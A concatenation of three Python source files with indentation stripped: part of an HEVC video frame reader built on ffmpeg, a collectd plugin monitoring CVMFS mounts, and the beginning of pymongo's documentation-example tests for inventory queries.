with tempfile.NamedTemporaryFile() as prefix_f, \
tempfile.NamedTemporaryFile() as index_f:
try:
subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
except subprocess.CalledProcessError:
raise DataUnreadableError("vidindex failed on file %s" % fn)
with open(index_f.name, "rb") as f:
index = f.read()
with open(prefix_f.name, "rb") as f:
prefix = f.read()
index = np.frombuffer(index, np.uint32).reshape(-1, 2)
assert index[-1, 0] == 0xFFFFFFFF
assert index[-1, 1] == os.path.getsize(fn)
return index, prefix
def cache_fn(func):
@wraps(func)
def cache_inner(fn, *args, **kwargs):
if kwargs.pop('no_cache', None):
cache_path = None
else:
cache_prefix = kwargs.pop('cache_prefix', None)
cache_path = cache_path_for_file_path(fn, cache_prefix)
if cache_path and os.path.exists(cache_path):
with open(cache_path, "rb") as cache_file:
cache_value = pickle.load(cache_file)
else:
cache_value = func(fn, *args, **kwargs)
if cache_path:
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(cache_value, cache_file, -1)
return cache_value
return cache_inner
@cache_fn
def index_stream(fn, typ):
assert typ in ("hevc", )
with FileReader(fn) as f:
assert os.path.exists(f.name), fn
index, prefix = vidindex(f.name, typ)
probe = ffprobe(f.name, typ)
return {
'index': index,
'global_prefix': prefix,
'probe': probe
}
def index_videos(camera_paths, cache_prefix=None):
"""Requires that paths in camera_paths are contiguous and of the same type."""
if len(camera_paths) < 1:
raise ValueError("must provide at least one video to index")
frame_type = fingerprint_video(camera_paths[0])
for fn in camera_paths:
index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if os.path.exists(cache_path):
return
if frame_type is None:
frame_type = fingerprint_video(fn[0])
if frame_type == FrameType.h265_stream:
index_stream(fn, "hevc", cache_prefix=cache_prefix)
else:
raise NotImplementedError("Only h265 supported")
def get_video_index(fn, frame_type, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if not os.path.exists(cache_path):
index_video(fn, frame_type, cache_prefix)
if not os.path.exists(cache_path):
return None
with open(cache_path, "rb") as cache_file:
return pickle.load(cache_file)
def read_file_check_size(f, sz, cookie):
buff = bytearray(sz)
bytes_read = f.readinto(buff)
assert bytes_read == sz, (bytes_read, sz)
return buff
def rgb24toyuv420(rgb):
yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ],
[-0.14714119, -0.28886916, 0.43601035 ],
[ 0.61497538, -0.51496512, -0.10001026 ]])
img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)
y_len = img.shape[0] * img.shape[1]
uv_len = y_len // 4
ys = img[:, :, 0]
us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128
yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
yuv420[:y_len] = ys.reshape(-1)
yuv420[y_len:y_len + uv_len] = us.reshape(-1)
yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)
return yuv420.clip(0, 255).astype('uint8')
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt):
# using a tempfile is much faster than proc.communicate for some reason
with tempfile.TemporaryFile() as tmpf:
tmpf.write(rawdat)
tmpf.seek(0)
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
"-vsync", "0",
"-f", vid_fmt,
"-flags2", "showall",
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null"))
# dat = proc.communicate()[0]
dat = proc.stdout.read()
if proc.wait() != 0:
raise DataUnreadableError("ffmpeg failed")
if pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
elif pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2))
elif pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
else:
raise NotImplementedError
return ret
class BaseFrameReader:
# properties: frame_type, frame_count, w, h
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
pass
def get(self, num, count=1, pix_fmt="yuv420p"):
raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None):
frame_type = fingerprint_video(fn)
if frame_type == FrameType.raw:
return RawFrameReader(fn)
elif frame_type in (FrameType.h265_stream,):
if not index_data:
index_data = get_video_index(fn, frame_type, cache_prefix)
return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind)
else:
raise NotImplementedError(frame_type)
class RawData:
def __init__(self, f):
self.f = _io.FileIO(f, 'rb')
self.lenn = struct.unpack("I", self.f.read(4))[0]
self.count = os.path.getsize(f) / (self.lenn+4)
def read(self, i):
self.f.seek((self.lenn+4)*i + 4)
return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
def __init__(self, fn):
# raw camera
self.fn = fn
self.frame_type = FrameType.raw
self.rawfile = RawData(self.fn)
self.frame_count = self.rawfile.count
self.w, self.h = 640, 480
def load_and_debayer(self, img):
img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]])
return cimg
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
assert num+count <= self.frame_count
if pix_fmt not in ("yuv420p", "rgb24"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
app = []
for i in range(num, num+count):
dat = self.rawfile.read(i)
rgb_dat = self.load_and_debayer(dat)
if pix_fmt == "rgb24":
app.append(rgb_dat)
elif pix_fmt == "yuv420p":
app.append(rgb24toyuv420(rgb_dat))
else:
raise NotImplementedError
return app
class VideoStreamDecompressor:
def __init__(self, vid_fmt, w, h, pix_fmt):
self.vid_fmt = vid_fmt
self.w = w
self.h = h
self.pix_fmt = pix_fmt
if pix_fmt == "yuv420p":
self.out_size = w*h*3//2 # yuv420p
elif pix_fmt in ("rgb24", "yuv444p"):
self.out_size = w*h*3
else:
raise NotImplementedError
self.out_q = queue.Queue()
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
self.proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
# "-avioflags", "direct",
"-analyzeduration", "0",
"-probesize", "32",
"-flush_packets", "0",
# "-fflags", "nobuffer",
"-vsync", "0",
"-f", vid_fmt,
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))
def read_thread():
while True:
r = self.proc.stdout.read(self.out_size)
if len(r) == 0:
break
assert len(r) == self.out_size
self.out_q.put(r)
self.t = threading.Thread(target=read_thread)
self.t.daemon = True
self.t.start()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def write(self, rawdat):
self.proc.stdin.write(rawdat)
self.proc.stdin.flush()
def read(self):
dat = self.out_q.get(block=True)
if self.pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
elif self.pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8)
elif self.pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
else:
assert False
return ret
def eos(self):
self.proc.stdin.close()
def close(self):
self.proc.stdin.close()
self.t.join()
self.proc.wait()
assert self.proc.wait() == 0
class StreamGOPReader(GOPReader):
def __init__(self, fn, frame_type, index_data):
assert frame_type == FrameType.h265_stream
self.fn = fn
self.frame_type = frame_type
self.frame_count = None
self.w, self.h = None, None
self.prefix = None
self.index = None
self.index = index_data['index']
self.prefix = index_data['global_prefix']
probe = index_data['probe']
self.prefix_frame_data = None
self.num_prefix_frames = 0
self.vid_fmt = "hevc"
i = 0
while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I:
i += 1
self.first_iframe = i
assert self.first_iframe == 0
self.frame_count = len(self.index) - 1
self.w = probe['streams'][0]['width']
self.h = probe['streams'][0]['height']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I:
frame_b -= 1
frame_e = num + 1
while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I:
frame_e += 1
offset_b = self.index[frame_b, 1]
offset_e = self.index[frame_e, 1]
return (frame_b, frame_e, offset_b, offset_e)
def get_gop(self, num):
frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e - frame_b
with FileReader(self.fn) as f:
f.seek(offset_b)
rawdat = f.read(offset_e - offset_b)
if num < self.first_iframe:
assert self.prefix_frame_data
rawdat = self.prefix_frame_data + rawdat
rawdat = self.prefix + rawdat
skip_frames = 0
if num < self.first_iframe:
skip_frames = self.num_prefix_frames
return frame_b, num_frames, skip_frames, rawdat
class GOPFrameReader(BaseFrameReader):
#FrameReader with caching and readahead for formats that are group-of-picture based
def __init__(self, readahead=False, readbehind=False):
self.open_ = True
self.readahead = readahead
self.readbehind = readbehind
self.frame_cache = LRU(64)
if self.readahead:
self.cache_lock = threading.RLock()
self.readahead_last = None
self.readahead_len = 30
self.readahead_c = threading.Condition()
self.readahead_thread = threading.Thread(target=self._readahead_thread)
self.readahead_thread.daemon = True
self.readahead_thread.start()
else:
self.cache_lock = DoNothingContextManager()
def close(self):
if not self.open_:
return
self.open_ = False
if self.readahead:
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
self.readahead_thread.join()
def _readahead_thread(self):
while True:
self.readahead_c.acquire()
try:
if not self.open_:
break
self.readahead_c.wait()
finally:
self.readahead_c.release()
if not self.open_:
break
assert self.readahead_last
num, pix_fmt = self.readahead_last
if self.readbehind:
for k in range(num - 1, max(0, num - self.readahead_len), -1):
self._get_one(k, pix_fmt)
else:
for k in range(num, min(self.frame_count, num + self.readahead_len)):
self._get_one(k, pix_fmt)
def _get_one(self, num, pix_fmt):
assert num < self.frame_count
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
with self.cache_lock:
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)
ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt)
ret = ret[skip_frames:]
assert ret.shape[0] == num_frames
for i in range(ret.shape[0]):
self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]
return self.frame_cache[(num, pix_fmt)]
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
if num + count > self.frame_count:
raise ValueError("{} > {}".format(num + count, self.frame_count))
if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
ret = [self._get_one(num + i, pix_fmt) for i in range(count)]
if self.readahead:
self.readahead_last = (num+count, pix_fmt)
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
return ret
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False):
StreamGOPReader.__init__(self, fn, frame_type, index_data)
GOPFrameReader.__init__(self, readahead, readbehind)
def GOPFrameIterator(gop_reader, pix_fmt):
# this is really ugly. ill think about how to refactor it when i can think good
IN_FLIGHT_GOPS = 6 # should be enough that the stream decompressor starts returning data
with VideoStreamDecompressor(gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt) as dec:
read_work = []
def readthing():
# print read_work, dec.out_q.qsize()
outf = dec.read()
read_thing = read_work[0]
if read_thing[0] > 0:
read_thing[0] -= 1
else:
assert read_thing[1] > 0
yield outf
read_thing[1] -= 1
if read_thing[1] == 0:
read_work.pop(0)
i = 0
while i < gop_reader.frame_count:
frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i)
dec.write(gop_data)
i += num_frames
read_work.append([skip_frames, num_frames])
while len(read_work) >= IN_FLIGHT_GOPS:
for v in readthing():
yield v
dec.eos()
while read_work:
for v in readthing():
yield v
def FrameIterator(fn, pix_fmt, **kwargs):
fr = FrameReader(fn, **kwargs)
if isinstance(fr, GOPReader):
for v in GOPFrameIterator(fr, pix_fmt):
yield v
else:
for i in range(fr.frame_count):
yield fr.get(i, pix_fmt=pix_fmt)[0]
|
__init__.py
|
import collectd
import xattr
import os
import psutil
import threading
import time
import uuid
try:
from os import scandir
except ImportError:
from scandir import scandir
CVMFS_ROOT = '/cvmfs'
PLUGIN_NAME = 'cvmfs'
CONFIG_DEFAULT_MEMORY = True
CONFIG_DEFAULT_MOUNTTIME = True
CONFIG_DEFAULT_INTERVAL = -1
CONFIG_DEFAULT_MOUNTTIMEOUT = 5
class CvmfsProbeConfig(object):
def __init__(self):
self.repos = []
self.attributes = []
self.memory = CONFIG_DEFAULT_MEMORY
self.mounttime = CONFIG_DEFAULT_MOUNTTIME
self.mounttimeout = CONFIG_DEFAULT_MOUNTTIMEOUT
self.interval = CONFIG_DEFAULT_INTERVAL
self.config_name = uuid.uuid4().hex
self.verbose = False
def __str__(self):
return "CvmfsProbeConfig - Repos: {0} - Attributes: {1} - Memory: {2} - MountTime: {3} - Interval: {4} - ConfigName: {5} - Verbose: {6}".format(
self.repos,
self.attributes,
self.memory,
self.mounttime,
"%ss" % self.interval if self.interval > 0 else "global interval",
self.config_name,
self.verbose
)
class CvmfsProbe(object):
def debug(self, msg, verbose=False):
if verbose:
collectd.info('{0} plugin: {1}'.format(PLUGIN_NAME, msg))
def safe_scandir(self, directory, timeout):
contents = []
t = threading.Thread(target=lambda: contents.extend(scandir(directory)))
t.daemon = True
t.start()
t.join(timeout)
if t.is_alive():
raise Exception("Scandir timed out after {0} seconds".format(timeout))
return contents
def read_mounttime(self, repo_mountpoint, timeout):
start = time.time()
self.safe_scandir(repo_mountpoint, timeout)
end = time.time()
# Did we really mount it ?
try:
xattr.getxattr(repo_mountpoint, 'user.fqrn') == repo_mountpoint
return end - start
except:
raise Exception("Repository was not mounted correctly")
def read_memory(self, repo_mountpoint):
repo_pid = int(xattr.getxattr(repo_mountpoint, 'user.pid'))
process = psutil.Process(repo_pid)
if callable(getattr(process, "get_memory_info", None)):
return process.get_memory_info()
else:
return process.memory_info()
def read(self, config):
self.debug("probing config: {0}".format((config)), config.verbose)
val = collectd.Values(plugin=PLUGIN_NAME)
for repo in config.repos:
val.plugin_instance = repo
val.interval = config.interval
repo_mountpoint = os.path.join(CVMFS_ROOT, repo)
try:
mounttime = self.read_mounttime(repo_mountpoint, config.mounttimeout)
if config.mounttime:
val.dispatch(type='mounttime', values=[mounttime], interval=config.interval)
val.dispatch(type='mountok', values=[1], interval=config.interval)
except Exception as e:
collectd.warning('cvmfs: failed to get MountTime for repo %s: %s' % (repo, e))
val.dispatch(type='mountok', values=[0], interval=config.interval)
if config.memory:
try:
repo_mem = self.read_memory(repo_mountpoint)
val.dispatch(type='memory', type_instance='rss', values=[repo_mem.rss], interval=config.interval)
val.dispatch(type='memory', type_instance='vms', values=[repo_mem.vms], interval=config.interval)
except Exception:
collectd.warning('cvmfs: failed to get Memory for repo %s' % repo)
for attribute in config.attributes:
attribute_name = "user.%s" % attribute
try:
val.dispatch(type=attribute, values=[float(xattr.getxattr(repo_mountpoint, attribute_name))], interval=config.interval)
except Exception:
collectd.warning('cvmfs: failed to inspect attribute "%s" in repo "%s"' % (attribute_name, repo_mountpoint))
def str2bool(self, boolstr):
if boolstr.lower() == 'true':
return True
elif boolstr.lower() == 'false':
return False
else:
raise TypeError('Boolean value expected.')
def configure(self, conf):
config = CvmfsProbeConfig()
for node in conf.children:
key = node.key.lower()
if key == 'repo':
config.repos += node.values
elif key == 'attribute':
config.attributes += node.values
elif key == 'memory':
try:
config.memory = self.str2bool(node.values[0])
except:
collectd.info("cvmfs: Memory value %s is not valid. It must be either True or False" % (node.values[0]))
elif key == 'mounttime':
try:
config.mounttime = self.str2bool(node.values[0])
except:
collectd.info("cvmfs: MountTime value %s is not valid. It must be either True or False" % (node.values[0]))
elif key == 'mounttimeout':
config.mounttimeout = int(node.values[0])
elif key == 'interval':
config.interval = int(node.values[0])
elif key == 'verbose':
config.verbose = self.str2bool(node.values[0])
if config.interval > 0:
collectd.register_read(callback=self.read, data=config, interval=config.interval, name=config.config_name)
else:
collectd.register_read(callback=self.read, data=config, name=config.config_name)
collectd.info("cvmfs: configured callback with config: {0}".format(config))
probe = CvmfsProbe()
collectd.register_config(probe.configure)
|
test_examples.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MongoDB documentation examples in Python."""
import datetime
import sys
import threading
sys.path[0:0] = [""]
import pymongo
from pymongo.errors import ConnectionFailure, OperationFailure
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.server_api import ServerApi
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import rs_client
class TestSampleShellCommands(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestSampleShellCommands, cls).setUpClass()
# Run once before any tests run.
cls.db.inventory.drop()
@classmethod
def tearDownClass(cls):
cls.client.drop_database("pymongo_test")
def tearDown(self):
# Run after every test.
self.db.inventory.drop()
def test_first_three_examples(self):
db = self.db
# Start Example 1
db.inventory.insert_one(
{"item": "canvas",
"qty": 100,
"tags": ["cotton"],
"size": {"h": 28, "w": 35.5, "uom": "cm"}})
# End Example 1
self.assertEqual(db.inventory.count_documents({}), 1)
# Start Example 2
cursor = db.inventory.find({"item": "canvas"})
# End Example 2
self.assertEqual(len(list(cursor)), 1)
# Start Example 3
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"size": {"h": 14, "w": 21, "uom": "cm"}},
{"item": "mat",
"qty": 85,
"tags": ["gray"],
"size": {"h": 27.9, "w": 35.5, "uom": "cm"}},
{"item": "mousepad",
"qty": 25,
"tags": ["gel", "blue"],
"size": {"h": 19, "w": 22.85, "uom": "cm"}}])
# End Example 3
self.assertEqual(db.inventory.count_documents({}), 4)
def test_query_top_level_fields(self):
db = self.db
# Start Example 6
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "A"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75, "size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 6
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 7
cursor = db.inventory.find({})
# End Example 7
self.assertEqual(len(list(cursor)), 5)
# Start Example 9
cursor = db.inventory.find({"status": "D"})
# End Example 9
self.assertEqual(len(list(cursor)), 2)
# Start Example 10
cursor = db.inventory.find({"status": {"$in": ["A", "D"]}})
# End Example 10
self.assertEqual(len(list(cursor)), 5)
# Start Example 11
cursor = db.inventory.find({"status": "A", "qty": {"$lt": 30}})
# End Example 11
self.assertEqual(len(list(cursor)), 1)
# Start Example 12
cursor = db.inventory.find(
{"$or": [{"status": "A"}, {"qty": {"$lt": 30}}]})
# End Example 12
self.assertEqual(len(list(cursor)), 3)
# Start Example 13
cursor = db.inventory.find({
"status": "A",
"$or": [{"qty": {"$lt": 30}}, {"item": {"$regex": "^p"}}]})
# End Example 13
self.assertEqual(len(list(cursor)), 2)
def test_query_embedded_documents(self):
db = self.db
# Start Example 14
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": SON([("h", 14), ("w", 21), ("uom", "cm")]),
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "A"},
{"item": "paper",
"qty": 100,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "D"},
{"item": "planner",
"qty": 75,
"size": SON([("h", 22.85), ("w", 30), ("uom", "cm")]),
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": SON([("h", 10), ("w", 15.25), ("uom", "cm")]),
"status": "A"}])
# End Example 14
# Start Example 15
cursor = db.inventory.find(
{"size": SON([("h", 14), ("w", 21), ("uom", "cm")])})
# End Example 15
self.assertEqual(len(list(cursor)), 1)
# Start Example 16
cursor = db.inventory.find(
{"size": SON([("w", 21), ("h", 14), ("uom", "cm")])})
# End Example 16
self.assertEqual(len(list(cursor)), 0)
# Start Example 17
cursor = db.inventory.find({"size.uom": "in"})
# End Example 17
self.assertEqual(len(list(cursor)), 2)
# Start Example 18
cursor = db.inventory.find({"size.h": {"$lt": 15}})
# End Example 18
self.assertEqual(len(list(cursor)), 4)
# Start Example 19
cursor = db.inventory.find(
{"size.h": {"$lt": 15}, "size.uom": "in", "status": "D"})
# End Example 19
self.assertEqual(len(list(cursor)), 1)
def test_query_arrays(self):
db = self.db
# Start Example 20
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"dim_cm": [14, 21]},
{"item": "notebook",
"qty": 50,
"tags": ["red", "blank"],
"dim_cm": [14, 21]},
{"item": "paper",
"qty": 100,
"tags": ["red", "blank", "plain"],
"dim_cm": [14, 21]},
{"item": "planner",
"qty": 75,
"tags": ["blank", "red"],
"dim_cm": [22.85, 30]},
{"item": "postcard",
"qty": 45,
"tags": ["blue"],
"dim_cm": [10, 15.25]}])
# End Example 20
# Start Example 21
cursor = db.inventory.find({"tags": ["red", "blank"]})
# End Example 21
self.assertEqual(len(list(cursor)), 1)
# Start Example 22
cursor = db.inventory.find({"tags": {"$all": ["red", "blank"]}})
# End Example 22
self.assertEqual(len(list(cursor)), 4)
# Start Example 23
cursor = db.inventory.find({"tags": "red"})
# End Example 23
self.assertEqual(len(list(cursor)), 4)
# Start Example 24
cursor = db.inventory.find({"dim_cm": {"$gt": 25}})
# End Example 24
self.assertEqual(len(list(cursor)), 1)
# Start Example 25
cursor = db.inventory.find({"dim_cm": {"$gt": 15, "$lt": 20}})
# End Example 25
self.assertEqual(len(list(cursor)), 4)
# Start Example 26
cursor = db.inventory.find(
{"dim_cm": {"$elemMatch": {"$gt": 22, "$lt": 30}}})
# End Example 26
self.assertEqual(len(list(cursor)), 1)
# Start Example 27
cursor = db.inventory.find({"dim_cm.1": {"$gt": 25}})
# End Example 27
self.assertEqual(len(list(cursor)), 1)
# Start Example 28
cursor = db.inventory.find({"tags": {"$size": 3}})
# End Example 28
self.assertEqual(len(list(cursor)), 1)
def test_query_array_of_documents(self):
db = self.db
# Start Example 29
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"instock": [
SON([("warehouse", "A"), ("qty", 5)]),
SON([("warehouse", "C"), ("qty", 15)])]},
{"item": "notebook",
"instock": [
SON([("warehouse", "C"), ("qty", 5)])]},
{"item": "paper",
"instock": [
SON([("warehouse", "A"), ("qty", 60)]),
SON([("warehouse", "B"), ("qty", 15)])]},
{"item": "planner",
"instock": [
SON([("warehouse", "A"), ("qty", 40)]),
SON([("warehouse", "B"), ("qty", 5)])]},
{"item": "postcard",
"instock": [
SON([("warehouse", "B"), ("qty", 15)]),
SON([("warehouse", "C"), ("qty", 35)])]}])
# End Example 29
# Start Example 30
cursor = db.inventory.find(
{"instock": SON([("warehouse", "A"), ("qty", 5)])})
# End Example 30
self.assertEqual(len(list(cursor)), 1)
# Start Example 31
cursor = db.inventory.find(
{"instock": SON([("qty", 5), ("warehouse", "A")])})
# End Example 31
self.assertEqual(len(list(cursor)), 0)
# Start Example 32
cursor = db.inventory.find({'instock.0.qty': {"$lte": 20}})
# End Example 32
self.assertEqual(len(list(cursor)), 3)
# Start Example 33
cursor = db.inventory.find({'instock.qty': {"$lte": 20}})
# End Example 33
self.assertEqual(len(list(cursor)), 5)
# Start Example 34
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": 5, "warehouse": "A"}}})
# End Example 34
self.assertEqual(len(list(cursor)), 1)
# Start Example 35
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": {"$gt": 10, "$lte": 20}}}})
# End Example 35
self.assertEqual(len(list(cursor)), 3)
# Start Example 36
cursor = db.inventory.find({"instock.qty": {"$gt": 10, "$lte": 20}})
# End Example 36
self.assertEqual(len(list(cursor)), 4)
# Start Example 37
cursor = db.inventory.find(
{"instock.qty": 5, "instock.warehouse": "A"})
# End Example 37
self.assertEqual(len(list(cursor)), 2)
def test_query_null(self):
db = self.db
# Start Example 38
db.inventory.insert_many([{"_id": 1, "item": None}, {"_id": 2}])
# End Example 38
# Start Example 39
cursor = db.inventory.find({"item": None})
# End Example 39
self.assertEqual(len(list(cursor)), 2)
# Start Example 40
cursor = db.inventory.find({"item": {"$type": 10}})
# End Example 40
self.assertEqual(len(list(cursor)), 1)
# Start Example 41
cursor = db.inventory.find({"item": {"$exists": False}})
# End Example 41
self.assertEqual(len(list(cursor)), 1)
def test_projection(self):
db = self.db
# Start Example 42
db.inventory.insert_many([
{"item": "journal",
"status": "A",
"size": {"h": 14, "w": 21, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 5}]},
{"item": "notebook",
"status": "A",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "C", "qty": 5}]},
{"item": "paper",
"status": "D",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "A", "qty": 60}]},
{"item": "planner",
"status": "D",
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 40}]},
{"item": "postcard",
"status": "A",
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"instock": [
{"warehouse": "B", "qty": 15},
{"warehouse": "C", "qty": 35}]}])
# End Example 42
# Start Example 43
cursor = db.inventory.find({"status": "A"})
# End Example 43
self.assertEqual(len(list(cursor)), 3)
# Start Example 44
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1})
# End Example 44
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 45
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "_id": 0})
# End Example 45
for doc in cursor:
self.assertFalse("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 46
cursor = db.inventory.find(
{"status": "A"}, {"status": 0, "instock": 0})
# End Example 46
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertFalse("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 47
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "size.uom": 1})
# End Example 47
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
size = doc['size']
self.assertTrue('uom' in size)
self.assertFalse('h' in size)
self.assertFalse('w' in size)
# Start Example 48
cursor = db.inventory.find({"status": "A"}, {"size.uom": 0})
# End Example 48
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertTrue("instock" in doc)
size = doc['size']
self.assertFalse('uom' in size)
self.assertTrue('h' in size)
self.assertTrue('w' in size)
# Start Example 49
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "instock.qty": 1})
# End Example 49
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
for subdoc in doc['instock']:
self.assertFalse('warehouse' in subdoc)
self.assertTrue('qty' in subdoc)
# Start Example 50
cursor = db.inventory.find(
{"status": "A"},
{"item": 1, "status": 1, "instock": {"$slice": -1}})
# End Example 50
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 1)
def test_update_and_replace(self):
db = self.db
# Start Example 51
db.inventory.insert_many([
{"item": "canvas",
"qty": 100,
"size": {"h": 28, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
